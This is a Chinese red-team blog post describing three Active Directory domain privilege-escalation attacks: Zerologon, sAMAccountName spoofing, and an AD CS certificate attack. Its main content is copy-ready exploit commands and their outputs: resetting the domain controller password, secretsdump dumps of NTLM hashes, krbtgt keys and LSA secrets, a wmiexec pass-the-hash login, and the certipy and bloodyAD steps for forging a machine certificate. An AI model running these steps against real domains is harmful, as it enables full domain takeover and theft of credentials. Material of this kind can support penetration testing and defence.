1. 首页
  2. 红队技术

Active Directory 域权限提升的几种方法

Active Directory 域权限提升的几种方法

1
域控Netlogon特权提升漏洞(CVE-2020-1472)

    一个比较好用的内网提权漏洞,影响Windows Server 2008R 2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重置目标域控的密码, 然后利用城控凭证进行Dc sync获取域管权限后修复域控密码,之所以不直接使用坏控凭证远程执行命令,是因为城控账户是不可以登录的,但是域控具备Dc sync权限, 可以获取域内任意用户的凭证。

漏洞利用过程中会重置域控存储在域中(ntds.dit)的凭证,而域控存储在域中的凭证与本地的注册表/lsass中的凭证不一致时,会导致目标域控脱域,所以在重置完域控凭证后要尽快恢复。

└─$ proxychains4 python cve-2020-1472-exploit.py ad 10.10.10.135[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.15Performing authentication attempts...[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:135  ...  OK[proxychains] Strict chain  ...  127.0.0.1:1088  ...  10.10.10.135:49158  ...  OK=====================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================Target vulnerable, changing account password to empty stringResult: 0Exploit complete!
python3 secretsdump.py scaner/ad$@10.10.10.135 -no-passAdministrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::scaner.secdb:1106:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::scaner.secmoonsec:1109:aad3b435b51404eeaad3b435b51404ee:51a52c415264a8fc31520f66f2f50459:::AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::12SERVER-DB$:1107:aad3b435b51404eeaad3b435b51404ee:3ebf8c0281893b7661e0897d434fd900:::[*] Kerberos keys grabbedkrbtgt:aes256-cts-hmac-sha1-96:2978bba376f83eab7acfd4a2e3c68f41b0fbf90f85014d8ec136cb0f9ab06460krbtgt:aes128-cts-hmac-sha1-96:e73c9453f5df1077d1132c562c3b20dfkrbtgt:des-cbc-md5:91f2ab6198c1adf2scaner.secdb:aes256-cts-hmac-sha1-96:21a881e53c7acb3ca6dfe29b94ad56f90e72f3771695e3413a1eda1394b076b5scaner.secdb:aes128-cts-hmac-sha1-96:83044b37dab189c04fff6d5ca76a4251scaner.secdb:des-cbc-md5:f2cd2c3bceae0dcdscaner.secmoonsec:aes256-cts-hmac-sha1-96:39054a2b86cb867177d23678dd40f2cfe89eaaa69f4a5e36725585cc0ad2faacscaner.secmoonsec:aes128-cts-hmac-sha1-96:fee3562d30d7a5556e87962382c828c6scaner.secmoonsec:des-cbc-md5:f1160b49cd8654e5AD$:aes256-cts-hmac-sha1-96:182d64eca1353b996e52514e769373643eb9d0ad78c8203ddfe9be00ff9e2930AD$:aes128-cts-hmac-sha1-96:9b3827f3d3c26a50b1ca574908577948AD$:des-cbc-md5:e6fd2cae86c479fb12SERVER-DB$:aes256-cts-hmac-sha1-96:2caf760f94b8b8c25d33ae599748f5f9e8a9b7770dd79cde858276b4c22cb42312SERVER-DB$:aes128-cts-hmac-sha1-96:43aa58ec20e5067c32f81d7827e0d78612SERVER-DB$:des-cbc-md5:97cb313b2931c7c7

proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb Administrator@10.10.10.135

Active Directory 域权限提升的几种方法

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCALImpacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x3598ef959977a32edee6a7e37fa84031[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::[*] Dumping cached domain logon information (domain/username:hash)[*] Dumping LSA Secrets[*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:3c6da21c49ad3ad0576f9ae27a373f29e4ba38394dbb9226a09399c45a82afbdf0a5fe04c97e564511800fc4f05c16c7d3c82cd37e9abbfd303d444bf98389a38e0dd0ee4f36d9ea8b11ee90c4a22da811eb35e036405ccf89913b95c353b2f90466c69a076afc338a6d2fe2cd8a185b9f656b92da5ee93bb098e82962f14d6813228a806e4a9fea4b3d5112a3ee799fe88f8767b03caf546cd59903b5a8d7e6ab3d6f3683024e74e3928df3cdf0791f3e58dc35c7a83344f020c22e2a42dd264d9a8f150d6d626955b8920e8559f90f9761ecf9d75976acb3762ab4468f3dac577ef1f52b89a6c8a13de18e21497c38$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:049d2188a55da0d1511d4391043c3a68[*] DefaultPassword (Unknown User):ROOT#123[*] DPAPI_SYSTEM dpapi_machinekey:0xdaf7eb3f8c0c99f3a9d8294f8d8c20c66eb4bf38dpapi_userkey:0xc74d45a5227c64b3efa07ce8d331c7d224891ed5[*] NL$KM  0000   AA C3 E0 AC C2 DA 1C 8A  E2 DB 90 CA 31 0B 7E 7A   ............1.~z 0010   6F 59 D2 1E BE 59 7D 65  25 B2 88 77 DE 20 C5 B2   oY...Y}e%..w. .. 0020   92 A6 4D 30 2D 1F 40 7D  64 2D 47 3B 92 C4 04 9D   ..M0-.@}d-G;.... 0030   EB DE 94 64 A6 7F 7F 5C  13 61 F4 C8 6E BA 0E B5   ...d....a..n...NL$KM:aac3e0acc2da1c8ae2db90ca310b7e7a6f59d21ebe597d6525b28877de20c5b292a64d302d1f407d642d473b92c4049debde9464a67f7f5c1361f4c86eba0eb5[*] Cleaning up... 

2
Windows 域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)

exp地址 https://github.com/WazeHell/sam-the-admin

python sam_the_admin.py "moonsec/test:pass123" -dc-ip 10.10.10.135 -shell 

Active Directory 域权限提升的几种方法

详细说明 https://mp.weixin.qq.com/s/B9iZIYezRfFR6wGnAgUNXQ

3
Active Directory 域权限提升漏洞(CVE-2022-26963)

详细 https://mp.weixin.qq.com/s/AuPajld1K7N5alAkgMZNfA

获取 ca certutil -config - -ping

生成证书certipy req 'moonsec.lab/test:pass123@ad.moonsec.lab' -ca moonsec-AD-CA -template User -debug测试证书certipy auth -pfx test.pfx -debug

查看ms-DS-MachineAccountQuota属性python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 getObjectAttributes 'DC=moonsec,DC=lab' ms-DS-MachineAccountQuota

使用bloodyAD工具来创建机器账户。python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135  addComputer sec123 pass123

如果ms-DS-MachineAccountQuota>0就可以创建机器帐户

更新机器帐户的DNS Host Name将机器帐户的DNS Host Name改为域控的ad.moonsec.labpython bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 setAttribute 'CN=sec123,CN=Computers,DC=moonsec,DC=lab' DNSHostName '["ad.moonsec.lab"]'

查看DNSHostName的指向python bloodyAD.py -d moonsec.lab -u test -p pass123 --host 10.10.10.135 getObjectAttributes 'CN=sec123,CN=Computers,DC=moonsec,DC=lab' DNSHostName

运行Certipy生成机器证书,可以看到DNS Host Name已经变成了ad.moonsec.lab
certipy req 'moonsec.lab/sec123$:pass123@ad.moonsec.lab' -ca moonsec-AD-CA -template Machine

验证证书 certipy auth -pfx ad.pfx -debug
impacket的secretsdump.py来dump哈希python secretsdump.py 'moonsec.lab/ad$@moonsec.lab' -hashes :76e0ba3e2c8333b929064f85dcc0a824

Active Directory 域权限提升的几种方法

Active Directory 域权限提升的几种方法

Active Directory 域权限提升的几种方法

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/5213.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息